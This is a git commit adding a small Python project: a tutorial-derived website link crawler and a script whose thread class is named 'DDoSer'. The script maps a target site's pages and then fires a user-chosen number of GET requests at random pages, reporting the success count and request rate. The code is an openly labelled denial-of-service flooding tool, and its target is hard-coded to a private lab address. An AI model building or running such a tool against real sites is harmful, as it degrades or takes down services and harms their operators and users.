This commit is contained in:
2020-04-19 22:53:20 +03:00
commit 6de8735eb5
3 changed files with 205 additions and 0 deletions

5
.gitignore vendored Normal file
View File

@@ -0,0 +1,5 @@
./idea
./venv
./vscode
./data.db
./__pycache__

83
__init__.py Normal file
View File

@@ -0,0 +1,83 @@
import os
import link_extractor
import time
import random
import progressbar
# import urllib.request as requests # urlib
# import faster_than_requests as requests # faster_than_requests
import requests
from datetime import datetime
from threading import Thread
global requestCountSuccess, requestCountExecuted
if not os.path.exists('./maps/'):
os.makedirs('./maps/')
def url_grab(full_url):
if os.path.exists(f'./maps/{url}'):
with open(f'./maps/{url}', 'r') as f:
subUrls = f.read().splitlines()
else:
subUrls = link_extractor.extractor('http://' + url)
os.mknod(f'./maps/{url}')
with open(f'./maps/{url}', 'w') as f:
for link in subUrls:
print(link.strip(), file=f)
print(datetime.now().strftime('[%X] ') + 'Карта сайта получена')
return subUrls
class DDoSer(Thread):
def __init__(self, url):
Thread.__init__(self)
self.url = url
def run(self):
global requestCountSuccess, requestCountExecuted
# responce = requests.urlopen(self.url).getcode() # urlib
responce = requests.get(self.url).status_code
if responce == 200:
requestCountSuccess += 1
requestCountExecuted += 1
if __name__ == '__main__':
# url = input(datetime.now().strftime('[%x %X] ') + 'Введите адрес сайта: ')
url = '192.168.56.102'
subUrls = url_grab(url)
requestCount = int(input(datetime.now().strftime('[%X] ') + 'Введите число запросов: '))
print()
startTime = time.time()
requestCountExecuted = 0
requestCountSuccess = 0
with progressbar.ProgressBar(max_value=requestCount) as bar:
for i in range(requestCount):
url = random.choice(subUrls)
thread = DDoSer(url)
thread.start()
thread.join()
bar.update(requestCountExecuted)
while requestCountExecuted < requestCount:
bar.update(requestCountExecuted)
print('\n' + datetime.now().strftime('[%X] ') + 'Всего выслано запросов: ' + str(requestCountExecuted))
print(datetime.now().strftime('[%X] ') + 'Успешных запросов: ' + str(requestCountSuccess))
print(datetime.now().strftime('[%X] ') + 'Средняя скорость: ' + str(round(requestCountExecuted/(time.time() - startTime))) + ' з/с')

117
link_extractor.py Normal file
View File

@@ -0,0 +1,117 @@
# https://github.com/x4nth055/pythoncode-tutorials/tree/master/web-scraping/link-extractor
import requests
from urllib.request import urlparse, urljoin
from bs4 import BeautifulSoup
import colorama
# init the colorama module
colorama.init()
GREEN = colorama.Fore.GREEN
GRAY = colorama.Fore.LIGHTBLACK_EX
RESET = colorama.Fore.RESET
# initialize the set of links (unique links)
internal_urls = set()
external_urls = set()
total_urls_visited = 0
def is_valid(url):
"""
Checks whether `url` is a valid URL.
"""
parsed = urlparse(url)
return bool(parsed.netloc) and bool(parsed.scheme)
def get_all_website_links(url):
"""
Returns all URLs that is found on `url` in which it belongs to the same website
"""
# all URLs of `url`
urls = set()
# domain name of the URL without the protocol
domain_name = urlparse(url).netloc
soup = BeautifulSoup(requests.get(url).content, "html.parser")
for a_tag in soup.findAll("a"):
href = a_tag.attrs.get("href")
if href == "" or href is None:
# href empty tag
continue
# join the URL if it's relative (not absolute link)
href = urljoin(url, href)
parsed_href = urlparse(href)
# remove URL GET parameters, URL fragments, etc.
href = parsed_href.scheme + "://" + parsed_href.netloc + parsed_href.path
if not is_valid(href):
# not a valid URL
continue
if href in internal_urls:
# already in the set
continue
if domain_name not in href:
# external link
if href not in external_urls:
print(f"{GRAY}[!] External link: {href}{RESET}")
external_urls.add(href)
continue
print(f"{GREEN}{href}{RESET}")
urls.add(href)
internal_urls.add(href)
return urls
def crawl(url, max_urls=50):
"""
Crawls a web page and extracts all links.
You'll find all links in `external_urls` and `internal_urls` global set variables.
params:
max_urls (int): number of max urls to crawl, default is 30.
"""
global total_urls_visited
total_urls_visited += 1
links = get_all_website_links(url)
for link in links:
if total_urls_visited > max_urls:
break
crawl(link, max_urls=max_urls)
def extractor(url):
crawl(url)
return internal_urls
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="Link Extractor Tool with Python")
parser.add_argument("url", help="The URL to extract links from.")
parser.add_argument("-m", "--max-urls", help="Number of max URLs to crawl, default is 30.", default=30, type=int)
args = parser.parse_args()
url = args.url
max_urls = args.max_urls
crawl(url, max_urls=max_urls)
print("[+] Total Internal links:", len(internal_urls))
print("[+] Total External links:", len(external_urls))
print("[+] Total URLs:", len(external_urls) + len(internal_urls))
domain_name = urlparse(url).netloc
# save the internal links to a file
with open(f"{domain_name}_internal_links.txt", "w") as f:
for internal_link in internal_urls:
print(internal_link.strip(), file=f)
# save the external links to a file
with open(f"{domain_name}_external_links.txt", "w") as f:
for external_link in external_urls:
print(external_link.strip(), file=f)